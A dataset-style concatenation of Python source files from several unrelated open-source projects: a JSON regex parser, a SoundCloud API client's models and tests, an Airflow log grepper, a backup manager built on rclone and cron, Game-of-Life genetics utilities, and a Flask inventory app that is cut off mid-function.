"source": "7ws/python-crystalball",
"score": 3
} |
#### File: python-crystalball/crystalball/parser.py
```python
import re
RE_JSON_KEY = re.compile(r'''
"(?P<key>[^"]*)" # Key
:\s* # Separator
# "(?P<value>(?:\"|.)*?)"
"(?P<value>[^"]*)" # Value
''', re.X)
class Parser:
"""
The main parser class
"""
def __init__(self, content):
"""
Build a catalog of useful data from content
"""
# Collect results extracted as JSON
self._json_cache = [
match.groups()
for match in RE_JSON_KEY.finditer(content)
]
def first(self, key):
"""
Find the first occurrence of "key"
"""
# Look through the JSON cache
for name, value in self._json_cache:
if key == name:
return value
# Exhaustion
else:
return None
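# --- Editor's hedged usage sketch; the sample JSON string is made up ---
def _parser_example():
    content = '{"name": "crystal", "kind": "ball"}'
    return Parser(content).first("kind")  # -> "ball"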
``` |
{
"source": "7x11x13/soundcloud.py",
"score": 3
} |
#### File: soundcloud/resource/base_item.py
```python
import datetime
from dataclasses import dataclass
from typing import List, Optional
from soundcloud.resource.base import BaseData
from soundcloud.resource.user import BasicUser
@dataclass
class BaseItem(BaseData):
artwork_url: Optional[str]
created_at: datetime.datetime
description: Optional[str]
duration: int
embeddable_by: str
genre: Optional[str]
id: int
kind: str
label_name: Optional[str]
last_modified: datetime.datetime
licence: Optional[str]
likes_count: Optional[int]
permalink: str
permalink_url: str
public: bool
purchase_title: Optional[str]
purchase_url: Optional[str]
release_date: Optional[str]
reposts_count: Optional[int]
secret_token: Optional[str]
sharing: str
tag_list: str
title: str
uri: str
user_id: int
display_date: str
def get_all_tags(self) -> List[str]:
tags = []
if self.genre:
tags.append(self.genre)
return tags + [tag.strip() for tag in self.tag_list.split('"') if tag.strip()]
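# --- Editor's hedged sketch of the parsing above; the example values are made up ---
# With genre == "Dance" and tag_list == '"multi word tag" single',
# get_all_tags() returns ['Dance', 'multi word tag', 'single'].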
```
#### File: soundcloud.py/tests/test_playlist.py
```python
from soundcloud import SoundCloud, BasicAlbumPlaylist
def test_get_playlist(client: SoundCloud):
playlist = client.get_playlist(1326192094)
assert isinstance(playlist, BasicAlbumPlaylist) and playlist.user.username == "7x11x13-testing"
def test_playlist_likers(client: SoundCloud):
likers = client.get_playlist_likers(1326192094)
found = False
for liker in likers:
if liker.username == "7x11x13":
found = True
break
assert found
def test_playlist_reposters(client: SoundCloud):
reposters = client.get_playlist_reposters(1326720835)
found = False
for reposter in reposters:
if reposter.username == "7x11x13":
found = True
break
assert found
```
#### File: soundcloud.py/tests/test_user.py
```python
import itertools
from soundcloud import SoundCloud, User
def test_valid_user_id(client: SoundCloud):
user = client.get_user(790976431)
assert isinstance(user, User) and user.permalink == "7x11x13"
def test_invalid_user_id(client: SoundCloud):
user = client.get_user("0")
assert user is None
def test_valid_username(client: SoundCloud):
user = client.get_user_by_username("7x11x13")
assert isinstance(user, User) and user.permalink == "7x11x13"
def test_invalid_username(client: SoundCloud):
user = client.get_user_by_username("")
assert user is None
def test_user_comments(client: SoundCloud):
comment = next(client.get_user_comments(992430331))
assert comment.body == "hi"
def test_user_conversation_messages(client: SoundCloud):
message = next(client.get_conversation_messages(790976431, 992430331))
assert message.content == "bye"
def test_user_conversations(client: SoundCloud):
found = False
for conversation in client.get_conversations(790976431):
if conversation.last_message.content == "bye":
found = True
assert found
def test_user_followers(client: SoundCloud):
found = False
for follower in client.get_user_followers(992430331):
if follower.permalink == "7x11x13":
found = True
break
assert found
def test_user_followings(client: SoundCloud):
following = next(client.get_user_following(992430331))
assert following.permalink == "7x11x13"
def test_user_likes(client: SoundCloud):
like = next(client.get_user_likes(992430331))
assert like.track.title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_likes_2(client: SoundCloud):
for like in itertools.islice(client.get_user_likes(790976431), 10):
assert like is not None
def test_user_reposts(client: SoundCloud):
repost = next(client.get_user_reposts(992430331))
assert repost.track.title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_tracks(client: SoundCloud):
tracks = list(client.get_user_tracks(790976431))
assert tracks[-1].title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_toptracks(client: SoundCloud):
tracks = list(client.get_user_popular_tracks(790976431))
assert tracks[0].title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_albums(client: SoundCloud):
found = False
for album in client.get_user_albums(211111464):
if album.title == "Positions":
found = True
break
assert found
def test_user_playlists(client: SoundCloud):
assert next(client.get_user_playlists(992430331)).title == "playlist1"
def test_user_links(client: SoundCloud):
user = client.get_user(992430331)
profiles = client.get_user_links(user.urn)
assert profiles[0].title == "test"
``` |
{
"source": "7yl4r/airflow_log_grepper",
"score": 2
} |
#### File: airflow_log_grepper/airflow_log_grepper/log_grepper.py
```python
import os
import re
import sys
import operator
import pprint
from glob import glob
import json
pp = pprint.PrettyPrinter(indent=4)
logdir = "/home/airflow/logs"
def matchwalk_re(regex, directory):
'''Yield path/filenames matching some regular expression
from https://stackoverflow.com/a/49681926/1483986
'''
sep = os.path.sep
pattern = re.compile(regex)
for p, _, f in os.walk(directory):
for i in range(len(f)):
if pattern.search(os.path.join(p, f[i])):
yield '{0}{1}{2}'.format(p, sep, f[i])
# else:
# print(p)
def get_logfiles(base_log_path, dag_glob, task_glob):
"""
Returns iterator of files in airflow DAG log directory.
Expects dir structure like:
/logs/dag_id/task_id/{task_instance_dt}/{n}.log
"""
full_glob = "{}/{}/{}/*/*.log".format(
base_log_path, dag_glob, task_glob
)
print("grepping logs matching glob :\n\t{}".format(full_glob))
for log_path in glob(full_glob):
yield log_path
def get_greps_from_config_json(json_config_fpath):
"""
json config file should be named with a filename like `${dag_glob}.json`
and look like:
{
"task_glob_1": [
{
"match_key_1": "string to grep for #1",
"match_key_2": "other string to grep for"
}
],
"task_glob_2": [{...}]
}
"""
# DAG glob comes from filename
dag_glob = os.path.basename(json_config_fpath).replace(".json", "")
with open(json_config_fpath) as json_file:
greps_by_task_globs_dict = json.load(json_file)
return dag_glob, greps_by_task_globs_dict
def progressbar(it, prefix="", size=60, file=sys.stdout):
"""
ASCII progress bar based on https://stackoverflow.com/a/34482761/1483986
"""
count = len(it)
def show(j):
try:
x = int(size*j/count)
except ZeroDivisionError:
x = count
file.write(
"%s[%s%s] %i/%i\r" % (prefix, "#"*x, "."*(size-x), j, count)
)
file.flush()
show(0)
for i, item in enumerate(it):
yield item
show(i+1)
file.write("\n")
file.flush()
def get_grepped_log_counts(greps_json_file, base_log_path):
"""
returns sorted dict of counts for all log classifications
"""
dag_glob, greps_by_task_globs = get_greps_from_config_json(greps_json_file)
counts = {}
# iterate over each task
print("{} tasks glob strings found".format(len(greps_by_task_globs)))
never_matched_files = []
for task_glob, greps in greps_by_task_globs.items():
print("\t{}".format(task_glob))
# import pdb; pdb.set_trace()
for key, strin in list(greps.items()):
assert key not in counts # no duplicate keys!
counts[key] = 0
counts['success'] = 0
counts['unmatched'] = 0
print("{} grep strings for this task glob".format(len(greps)))
# search this task's logfiles
unmatched_files = []
log_files = list(get_logfiles(base_log_path, dag_glob, task_glob))
for i in progressbar(range(len(log_files))):
file = log_files[i]
# grep the file for strings
# print(files) #entry.name)
matches = []
fstr = open(file).read()
# special case for successful run:
if fstr.strip().endswith("Command exited with return code 0"):
counts['success'] += 1
matches.append('success')
for grep_key, grep_str in list(greps.items()):
if grep_str in fstr:
counts[grep_key] += 1
matches.append(grep_key)
# print(grep_key)
if len(matches) == 1:
pass
elif len(matches) > 1:
# print('ERR: multiple matches!:{}'.format(matches))
# print(file)
for key in matches:
counts[key] -= 1
multimatch_key = '_AND_'.join(matches)
counts[multimatch_key] = counts.get(multimatch_key, 0) + 1
else: # matches < 1:
unmatched_files.append(file.replace(base_log_path, ""))
else:
# keep unmatched_files from this search & previous
never_matched_files.extend(
unmatched_files
)
if len(never_matched_files) > 0:
print("{} UNMATCHED files! First 10:".format(
len(never_matched_files)
))
pp.pprint(never_matched_files[:10])
counts['unmatched'] = len(never_matched_files)
print("\n" + "-"*100)
sorted_counts = sorted(counts.items(), key=operator.itemgetter(1))
pp.pprint(sorted_counts)
return sorted_counts
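def _example_run():
    # Editor's hedged usage sketch; both paths are assumptions. The config
    # filename (minus ".json") doubles as the DAG glob that gets grepped.
    return get_grepped_log_counts(
        "/etc/airflow_log_grepper/my_dag.json",
        "/home/airflow/logs",
    )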
``` |
{
"source": "7yl4r/backdat",
"score": 3
} |
#### File: backdat/backdat/BackupManager.py
```python
from datetime import datetime, timedelta
import logging
from croniter import croniter
from backdat.RemoteInterface import rclone
from backdat.file_parsers import backup_plan, host_settings
from backdat.file_parsers import crontab
from backdat.file_parsers import backup_history
from backdat.file_parsers import backup_stats
from backdat.util.get_hostname import get_hostname
from backdat.planners.util import make_plan_line
from backdat.planners.dumbplan import make_plan
class BackupArgs(object):
""" basically a dict to pass to the back up driver (RemoteInterface)...
why didn't I just use a dict?
"""
source = "/opt/backdat/backdat.py"
target = "gdrive-ty:/IMARS/backups/test/"
backuper_log = "/var/opt/backdat/backup.log"
summarylog = "/var/opt/backdat/summary.log"
rclonelog = None
window = str(24*30*9)+"h"
verbose = 0
def get_plan_line(self):
"""
convert BackupManger.BackupArgs object into string matching the
format of a line in backup_plan.tsv
"""
time_string = "2222-22-22T22:22:22" # TODO: somehow use real time here?
return make_plan_line(time_string, get_hostname() + ":" + self.source, self.target)
class BackupManager(object):
""" BackupManager manages backing up of files in a backup session """
def __init__(self):
self.next_backup_args = BackupArgs()
self.logger = logging.getLogger(__name__)
def start_backups(self):
"""
starts running backups until we are outside of our allotted window
"""
self.logger.info(" === START === ")
try:
hostname = get_hostname()
for next_backup in backup_plan.read(hostname):
self.logger.debug(".")
self.set_next_backup(next_backup)
if (BackupManager.enough_time_remaining()):
self.do_next_backup()
else:
self.logger.info("Not within backup window.")
break
else:
self.logger.warn("Finished all backups with time to spare!")
# re-plan?
make_plan()
# schedule next run of BackupManager in crontab & exit
finally:
winend, next_scheduled_time = BackupManager.get_window_edges(
BackupManager.get_host_setting(host_settings.KEYS.BACKUP_TIMES)
)
crontab.write_crontab(next_scheduled_time)
# TODO: update backup plan before exiting
self.logger.info(" === END === ")
def do_next_backup(self):
"""
do the next backup action
"""
self.logger.info("starting next backup action...")
try:
rclone.backup(self.next_backup_args)
status = backup_stats.ACTION_STATUS.DONE
backup_history.log_backup_action(self.next_backup_args)
except Exception as err:
self.logger.error("backup action failed!", err)
status = backup_stats.ACTION_STATUS.FAIL
finally:
backup_stats.update_stats(
self.next_backup_args,
status
)
backup_plan.remove_action(self.next_backup_args)
def set_next_backup(self, backup_dict):
""" loads given backup dict into next_backup_args """
self.logger.debug(backup_dict["source"] + "\n\t=> " + backup_dict["target"])
self.next_backup_args.source = backup_dict["source"]
self.next_backup_args.target = backup_dict["target"]
@staticmethod
def get_host_setting(key):
settings = host_settings.read()
return settings[key]
@staticmethod
def enough_time_remaining():
"""
return true if we have enough time left in the window to complete
the next backup task
"""
estimated_next_backup_tf = datetime.now() + timedelta(minutes=5)
# NOTE: could calc better estimate
return BackupManager.inside_cron_window(
estimated_next_backup_tf,
BackupManager.get_host_setting(host_settings.KEYS.BACKUP_TIMES)
)
@staticmethod
def inside_cron_window(dtime, windowstr):
"""
returns true if given datetime is within given window cron string
---------
dtime : datetime
windowstr : str
"""
logger = logging.getLogger(__file__)
window_end, next_window = BackupManager.get_window_edges(windowstr)
if dtime < window_end:
logger.debug(str(dtime) + " is inside the window")
return True
else:
logger.debug(str(dtime) + " is after end of window")
return False
@staticmethod
def get_window_edges( windowstr, MAX_DELTA=timedelta(hours=25)):
"""
Returns the datetime of the end of the current backup window
and the datetime of the start of the next window.
Assumes the window is smaller than MAX_DELTA.
Parameters
----------------
windowstr : crontab-like str
the window to explore
MAX_DELTA : datetime.timedelta
max time in future to check for the window before giving up
and assuming the window is infinite
"""
logger = logging.getLogger(__file__)
def _max_window_edges():
""" use this when the window looks infinite """
return datetime.max, datetime.now() + timedelta(hours=1)
if windowstr == "* * * * *":
logger.warn("Attempting to calculate edge of infinite window!")
return _max_window_edges()
else:
time_to_give_up = datetime.now() + MAX_DELTA
last_time = datetime.now()
# threshold should be << than window width, but > cron granularity
# this method assumes that the cron string minutes column is *, ie
# cron granularity is 1min and min window width is 1hr.
threshold = timedelta(minutes=2)
window_iter = croniter(windowstr, last_time)
while(True):
next_time = window_iter.get_next(datetime)
if next_time - last_time < threshold:
# logger.debug(
# 'next:' + str(next_time) +
# ' last:' + str(last_time)
# )
if last_time > time_to_give_up:
logger.warn(
"Search for end of window exceeded MAX_DELTA (" +
str(MAX_DELTA) + ")"
)
return _max_window_edges()
else:
last_time = next_time
else:
logger.debug("running until " + str(last_time))
logger.debug("will resume at " + str(next_time))
return last_time, next_time
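def _example_window():
    # Editor's hedged usage sketch; the cron string is illustrative. For a
    # nightly 00:00-05:59 backup window this returns the datetime at which the
    # current block of matching minutes ends and when the next block starts.
    return BackupManager.get_window_edges("* 0-5 * * *")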
```
#### File: backdat/backdat/DuplicateLogFilter.py
```python
import logging
class DuplicateLogFilter(logging.Filter):
"""
This filter prevents duplicate messages from being printed repeatedly.
Adapted from https://stackoverflow.com/a/44692178/1483986
"""
def filter(self, record):
# add other fields if you need more granular comparison, depends on your app
current_log = (record.module, record.levelno, record.msg)
if current_log != getattr(self, "last_log", None):
self.last_log = current_log
return True
return False
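# --- Editor's hedged usage sketch; the logger name is an assumption ---
def _install_duplicate_filter():
    log = logging.getLogger("backdat")
    log.addFilter(DuplicateLogFilter())
    return log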
```
#### File: backdat/file_parsers/fileset.py
```python
import csv
import os
from datetime import timedelta
import logging
# import pprint # needed for debugging only
default_fileset_path="/etc/opt/backdat/fileset.tsv"
class STAT_KEYS:
SIZE = 'size'
SOURCE = 'filepath'
TARGET = 'target'
UPLOAD_TIME = 'ul_time'
def get_upload_size(fileset_path=default_fileset_path):
"""
returns:
total size of all uploads in this host's fileset.tsv
"""
logger = logging.getLogger(__name__)
logger.debug("=== file stats ===")
total_size = 0
for fstat in get_fileset_statlist(fileset_path):
logger.debug("{} : {}b".format(fstat[STAT_KEYS.SOURCE].split('/')[-1], fstat[STAT_KEYS.SIZE]))
total_size += fstat[STAT_KEYS.SIZE]
logger.debug("=== ==== ===== ===")
return total_size
def get_fileset_statlist(cfgfilename=default_fileset_path):
"""
reads given fileset.tsv and outputs list of stats for the files in the
following form:
[
{
filepath: "/home/me/example_file.txt",
target: "gdrive-me:/example/remote/target/dir/"
size: 1024,
ul_time: 300
}, {...}, {...}
]
"""
statlist = []
with open(cfgfilename,'r') as tsvin:
reader = csv.reader(tsvin, delimiter='\t')
for row in reader:
if len(row) < 1 or row[0].startswith('#'): # ignore comment lines
pass
else:
src_filepath = row[0].strip()
file_paths = [] # List which will store all of the filepaths.
if "*" in src_filepath:
src_filepath = src_filepath.replace("*", "")
# Walk the tree.
for root, directories, files in os.walk(src_filepath):
for filename in files:
# Join the two strings to form the full filepath.
filepath = os.path.join(root, filename)
file_paths.append(filepath) # Add it to the list.
elif os.path.isdir(src_filepath):
# dir we want to upload all at once
if not src_filepath.endswith('/'): # ensure the directory path has a trailing '/'
src_filepath += '/'
file_paths = [src_filepath]
else: # is file
file_paths = [src_filepath]
for src_filename in file_paths:
target_dirmap = row[1].strip()
# stat file(s)
size = os.stat(src_filename).st_size # in Bytes [B]
# estimate upload time
# TODO: make estimate here?
# float(size)/ul_speed
# setup_time = 120 # [s]
# ul_est = timedelta(seconds=(ul_time + setup_time))
ul_est = None
statlist.append({
STAT_KEYS.SOURCE: src_filename,
STAT_KEYS.TARGET: target_dirmap,
STAT_KEYS.SIZE: size,
STAT_KEYS.UPLOAD_TIME: ul_est
})
#pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(statlist)
return statlist
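# --- Editor's hedged sketch of the fileset.tsv layout this parser expects ---
# (paths and remotes are made-up examples; columns are tab-separated, '#' lines
# are comments, and a trailing '*' on the source means "walk the whole tree")
#
#   /home/me/docs/*<TAB>gdrive-me:/backups/docs/
#   /home/me/notes.txt<TAB>gdrive-me:/backups/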
```
#### File: backdat/RemoteInterface/rclone_test.py
```python
from unittest import TestCase
try:
# py2
from mock import MagicMock
except ImportError:
# py3
from unittest.mock import MagicMock
# dependencies:
from backdat.RemoteInterface import rclone
class Test_rclone_driver(TestCase):
# tests:
#########################
def test_parse_elapsed_time_seconds_only(self):
""" test parse elapsed on seconds only output """
result = rclone.parse_time_spent("Elapsed time: 27.9s")
self.assertEqual(result, 28)
def test_parse_elapsed_time_min_n_sec(self):
""" test parse elapsed time min+sec """
result = rclone.parse_time_spent("Elapsed time: 18m27.9s")
self.assertEqual(result, 1108)
def test_parse_elapsed_time_hr_min_sec(self):
""" test parse elapsed time hr+min+sec """
result = rclone.parse_time_spent("Elapsed time: 1h18m27.9s")
self.assertEqual(result, 4708)
``` |
{
"source": "7yl4r/eggsmark",
"score": 2
} |
#### File: eggsmark/eggsmark/xmd_knit.py
```python
from subprocess import run
import os.path
import logging
from eggsmark.get_chunks import get_chunks
from eggsmark.get_param_eggs import get_header_param_eggs
def knit(
input_path, output_path, verbose=0, quiet=False
):
logger = logging.getLogger("eggsmark.{}".format(
__name__,
))
OUT_DIR, OUT_FILENAME = os.path.split(output_path)
tmp_path = "/tmp/{}.Rmd".format(os.path.basename(input_path))
logger.info("creating tmp files...")
run([
'cp',
input_path,
tmp_path
])
logger.info("knitting...")
    # TODO: DO THIS:
    with open(input_path) as f_obj:
        lines = f_obj.readlines()  # read once; a second readlines() on the same handle returns an empty list
        param_eggs = get_header_param_eggs(lines)
        for chunk, chunk_info in get_chunks(lines):
if chunk_info['language'] == "python":
result_output, new_eggs = knit_chunk(chunk, param_eggs)
# # param_eggs.extend(new_eggs)
# TODO: replace_in_output_file(chunk_info, result_output)
# # b. inject output
# TODO: INSTEAD OF THIS:
result = run([
'R',
'-e',
(
'rmarkdown::render('
'"{}", '
'output_dir="{}", '
'output_file="{}"'
')'
).format(tmp_path, OUT_DIR, OUT_FILENAME)
])
print(result)
# TODO: assert result is zero or...?
``` |
{
"source": "7yl4r/LifeGenes",
"score": 3
} |
#### File: LifeGenes/lifegenes_core/cellList.py
```python
from .cell import Cell
import pickle
import logging
# a generalized list of cells
# FIELDS:
# cells - a list of cell objects
# PUBLIC METHODS:
# findCell - locate a cell by x,y coords
# killCellAt - remove a cell by x,y coords
# save - save cellList to file
# load - load cellList from file
# set - make this list into a copy of given list
class cellList:
def __init__(self,pattern):
self.cells = list()
# add cell object to list for each pair in pattern
        for cellIndex in range(len(pattern)//2):  # pattern is a flat [x0, y0, x1, y1, ...] list
            self.cells.append(Cell(pattern[cellIndex*2],pattern[cellIndex*2+1]))
def setCell(self,x,y,dna=None,cell=None):
if cell != None:
self.killCellAt(x,y) #remove old cell if exists
self.cells.append(cell) #add new cell
elif dna != None:
            self.killCellAt(x,y)  # lowercase method name; remove old cell if exists
            self.cells.append(Cell(x,y,dna))  # use the Cell class, not the undefined name "cell"
else:
raise ValueError("setCell requires dna or cell object be specified")
def findCell(self,x,y):
        # returns cell object with given coords
for c in self.cells:
if c.x==x and c.y==y:
return c
#implied else
return None
    def killCellAt(self,x,y):
        # deletes cell at given loc. Returns True for successful deletion, False for cell not found.
        for c in self.cells:
            if c.x==x and c.y==y:
                self.cells.remove(c)
                return True
        return False
def save(self,fname):
# saves the cell list to the given file name
with open(fname,'wb') as f:
pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)
def load(self,fname):
# loads the cell list from the given file name
with open(fname,'rb') as f:
newList = pickle.load(f)
try:
check = newList.cells[0]
except (AttributeError, IndexError) as err:
logging.error('loaded list seems to have no cells!')
raise err
#implied else
self.set(newList)
logging.info(str(len(self.cells))+' cells loaded from file')
#except: logging.error('cellList load appears to have failed. dir(cellList)='+str(dir(self)))
def set(self,cList):
# makes the cell list a copy of the given cellList
self.cells = cList.cells
```
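A small sketch of the list in use. The flat `[x0, y0, x1, y1, ...]` pattern format follows the constructor above; the `Cell(x, y)` signature is assumed from how it is called there, and the file paths are arbitrary.
```python
from LifeGenes.lifegenes_core.cellList import cellList

pattern = [0, 0,  1, 0,  0, 1]       # three cells at (0,0), (1,0) and (0,1)
cells = cellList(pattern)
print(len(cells.cells))              # 3
print(cells.findCell(1, 0))          # the Cell object at (1, 0), or None if absent
cells.killCellAt(0, 1)               # returns True on success
cells.save('/tmp/cells.pkl')         # pickled to disk; load() restores it later
```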
#### File: LifeGenes/lifegenes_core/genetic_sampler.py
```python
import golly as g
from LifeGenes.lifegenes_core.cellList import cellList
from LifeGenes.lifegenes_core.environment import environment
from LifeGenes.lifegenes_core.cellPallate import CELL_COLLECTION_DIR, cellPallate
import logging
def collect_dna():
# prepare environment
env = environment()
# ask user to select cell of interest
g.setcursor("Pick")
g.show('select cell to sample')
event = g.getevent(True) #turn on golly event script access
while not event.startswith("click"):
        event = g.getevent() # poll for the next event
# event is a string like "click 10 20 left none"
g.getevent(False) # return event handling to golly
evt, xstr, ystr, butt, mods = event.split()
x = int(xstr)
y = int(ystr)
logging.info('cell ('+xstr+','+ystr+') selected')
try:
# retrieve selected cell
selectedCell = env.cellList.findCell(x,y)
except AttributeError:
g.show('cannot find cell!')
        logging.error('cell not found. len(cellList)='+str(len(env.cellList.cells)))  # use the environment's cellList instance
env.teardown()
return
# prompt user for name
import Tkinter as tk
root = tk.Tk()
class selectorDisplay:
def __init__(self, master, selectedCell):
self.pallate = cellPallate() # cell pallate instance for saving cell info
self.frame = tk.Frame(master)
self.frame.pack()
self.cell = selectedCell
instructions = tk.Label(root, text='Please enter a name for this cell.\n\
NOTE: names should only consist of letters, numbers, "_", and "-"')
instructions.pack()
self.entry = tk.Entry(master)
self.entry.pack()
self.entry.focus_set()
button_save = tk.Button(master, text="save", width=10,
command=self.submitEntry)
button_save.pack()
button_cancel = tk.Button(master, text="cancel", width=10,
command=self.frame.quit)
button_cancel.pack()
def submitEntry(self):
# save the cell
name = self.entry.get()
g.show('saving ' + name + ' to ' + CELL_COLLECTION_DIR)
self.pallate.saveCell(self.cell,name)
self.frame.quit() # close dialog
g.show('DNA sample saved to collection')
app = selectorDisplay(root,selectedCell)
root.mainloop()
import _tkinter
try:
root.destroy() # optional...ish
except _tkinter.TclError:
pass # ignore failed destroy due to already being destroyed.
env.teardown()
return
# make DNA display?
#from Tkinter import *
#root = Tk()
#w = Label(root, text="Hello, world!")
#w.pack()
#root.mainloop()
```
#### File: LifeGenes/lifegenes_core/setupLog.py
```python
# appending to the file as the script is run multiple times
from os.path import expanduser,join
from os import makedirs
import logging
from LifeGenes.lifegenes_core.__util.appdirs import user_log_dir
def setupLog(logName='noName.txt'):
logDir = user_log_dir('LifeGenes','7yl4r-ware')
try:
makedirs(logDir)
except OSError:
pass # probably the dir already exists...
logPath = join(logDir,logName)
logging.basicConfig(filename=logPath,\
level=logging.DEBUG,\
format='%(asctime)s %(levelname)s:%(message)s',\
filemode='w')
# # assume that you want your logs in LifeGenes source which is in your home directory
# # (this works best on my linux machine)
# home = expanduser("~")
# logDir = home+'/LifeGenes/__logs'
# try:
# mkdir(logDir)
# except OSError:
# pass # probably the dir already exists...
#
# logPath = logDir+'/'+logName
# print str(logging.getLogger())
# logging.basicConfig(filename=logPath,\
# level=logging.DEBUG,\
# format='%(asctime)s %(levelname)s:%(message)s',\
# filemode='w')
try:
import golly as g
g.show('created .log at '+str(logPath))
except ImportError:
print 'created .log at '+str(logPath)
```
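A short sketch of how a Golly script might call the helper above; the log file name is arbitrary.
```python
import logging
from LifeGenes.lifegenes_core.setupLog import setupLog

setupLog('example_script.log')     # creates the log file under the per-user log directory
logging.info('script started')     # subsequent logging calls are written to that file
```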
#### File: lifegenes_core/tests/folly.py
```python
import logging
class follyInstance:
def __init__(self):
# change these values to test different start-cases:
logging.warn('using mock-GoL "folly"')
self.currentLayer = 0
self.curLayerEmpty= False
self.layerColors = [[0,255]]
self.layerNames = ['first!'] #i'm not sure what this actually looks like in golly
self.layerRules = ['life']
self.nLayers = 1
self.maxLayers = 10
self.generation = 0
self.getcellsconfig= 'const growing'#'const change 1k' #'no change 1k' #'no change few'
def show(self,s):
#prints a string somewhere (to the console in this case)
print s
return
# golly behavior:
#Add a new, empty layer immediately after the current layer and return the new layer's index,
# an integer from 0 to numlayers() - 1.
# The new layer becomes the current layer and inherits most of the previous layer's settings,
# including its algorithm, rule, scale, location, cursor mode, etc.
# The step exponent is set to 0, there is no selection, no origin offset, and the layer's initial name is "untitled".
def addlayer(self):
if self.nLayers+1 >= self.maxLayers:
print 'ERR: attempt to add layer above maxlayers'
else:
self.layerNames.append('untitled')
self.layerColors.append(self.layerColors[self.getlayer()])
self.layerRules.append(self.layerRules[self.getlayer()])
self.currentLayer = self.nLayers
self.nLayers+=1
return self.currentLayer
def clear(self,where=0):
if where==0:
#clear inside
return
elif where==1:
#clear outside
return
else:
raise ValueError('clear() expects 1 or 0 only')
# golly behavior:
# Return True if the universe is empty or False if there is at least one live cell.
# This is much more efficient than testing getpop() == "0".
def empty(self):
return self.curLayerEmpty
def randfill(self,int):
# fills the current selection with given percentage density
return
def exit(self,msg):
print 'requested exit via exit() method with message:'
print msg
exit()
def getcell(self,x,y):
return 1
    # golly behavior:
#Return any live cells in the specified rectangle as a cell list.
# The given list can be empty (in which case the cell list is empty)
# or it must represent a valid rectangle of the form [x,y,width,height].
def getcells(self,boundingRect):
if self.getcellsconfig == 'no change few':
# return a couple of cells:
return [0 ,1,\
1 ,1,\
1 ,0,\
0 ,0]
elif self.getcellsconfig == 'no change 1k':
# return the same many cells every time:
cellList = list()
for cellN in range(1000):
cellList.append(cellN) #x loc
cellList.append(0) #y loc
return cellList
elif self.getcellsconfig == 'const change 1k':
# return different 1k cells every time, i.e. all cells in last generation die and are replaced
cellList = list()
for cellN in range(1000):
cellList.append(cellN)
cellList.append(self.generation)
return cellList
elif self.getcellsconfig == 'const growing':
# return a list of cells which grows a const amount each generation and no cells ever die
cellList = list()
for cellN in range( (self.generation+1)*100):
cellList.append(cellN)
cellList.append(0)
return cellList
else:
self.exit('ERR: unrecognized getcellsconfig string')
# matches golly behavior:
# Return the index of the current layer, an integer from 0 to numlayers() - 1.
def getlayer(self):
return self.currentLayer
def getname(self,index):
return self.layerNames[index]
#golly behavior:
# Return the current pattern's bounding box as a list.
# If there is no pattern then the list is empty ([]),
# otherwise the list is of the form [x,y,width,height].
def getrect(self):
return [0,0,101,121]
    def maxlayers(self):
        return self.maxLayers  # the attribute set in __init__, not this method itself
def numlayers(self):
return self.nLayers
def select(self,list):
return
def setcell(self,x,y,val):
#yeah... whatever...
return
def setcolors(self,colors):
self.layerColors[self.getlayer()] = colors
def setlayer(self,layern):
        self.currentLayer = layern  # match the attribute name used elsewhere in this class
def setname(self,name):
self.layerNames[self.getlayer()] = name
def setrule(self,rule):
self.layerRules[self.getlayer()] = rule
def show(self,msg):
print msg
return
def step(self):
self.generation+=1
return
def update(self):
return
folly = follyInstance()
``` |
{
"source": "7zmau/inv-man",
"score": 2
} |
#### File: inv-man/invman/__init__.py
```python
import os
from flask import Flask
def create_app():
app = Flask(__name__)
app.config.from_mapping(
SECRET_KEY='dev',
DATABASE=os.path.join(app.instance_path, 'invman.sqlite'),
)
try:
os.makedirs(app.instance_path)
except OSError:
pass
from . import start
app.register_blueprint(start.bp)
from . import main
app.register_blueprint(main.bp)
from . import db
db.init_app(app)
return app
```
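A minimal way to run the application factory above with Flask's built-in development server (illustrative only; the sqlite schema is expected to be set up by `invman.db`):
```python
from invman import create_app

app = create_app()

if __name__ == "__main__":
    # development server only; use a proper WSGI server in production
    app.run(debug=True)
```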
#### File: inv-man/invman/main.py
```python
from flask import (
Blueprint,
render_template,
request,
url_for,
g,
redirect,
session,
jsonify,
)
from invman.db import get_db
from invman.start import login_required
bp = Blueprint("main", __name__, url_prefix="/main")
def product_list(id):
""" Retrieves products which are in the product table. """
db = get_db()
product_list = db.execute(
"SELECT product_id, product_name, quantity FROM product WHERE for_business = ? AND quantity > 0",
(id,),
).fetchall()
return product_list
def get_product(location, product_id, quantity):
""" Used by the movement route to get a product from a location. """
product_array = []
db = get_db()
b_id = session.get("user_id")
if location == "product_factory":
# Get product from product table, deduct the quantity
ogquantity = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity - quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = (
"UPDATE product SET quantity = ? WHERE product_id = ? AND for_business = ?"
)
db.execute(query, (newquantity, product_id, b_id))
p = db.execute(
"SELECT product_id FROM product WHERE for_business = ? AND product_id = ?",
(b_id, product_id,),
).fetchone()
product_array = list(p)
product_array.append(quantity)
db.commit()
return product_array
else:
ogquantity = db.execute(
"SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
(location, product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity - quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = (
"UPDATE warehouse SET qty = ? where loc_id = ? AND prod_id = ? AND b_id = ?"
)
db.execute(query, (newquantity, location, product_id, b_id,))
p = db.execute(
"SELECT prod_id FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
(product_id, location, b_id,),
).fetchone()
if int(newquantity) == 0:
db.execute(
"DELETE FROM warehouse WHERE b_id = ? AND prod_id = ? AND loc_id = ?",
(b_id, product_id, location,),
)
product_array = list(p)
product_array.append(quantity)
db.commit()
return product_array
def set_product(location, product_array):
""" Used by the movement route to set a product to a location. """
db = get_db()
b_id = session.get("user_id")
product_id = product_array[0]
quantity = product_array[1]
if location != "Move out":
product_exists = db.execute(
"SELECT * FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
(product_id, location, b_id),
).fetchone()
if product_exists:
ogquantity = db.execute(
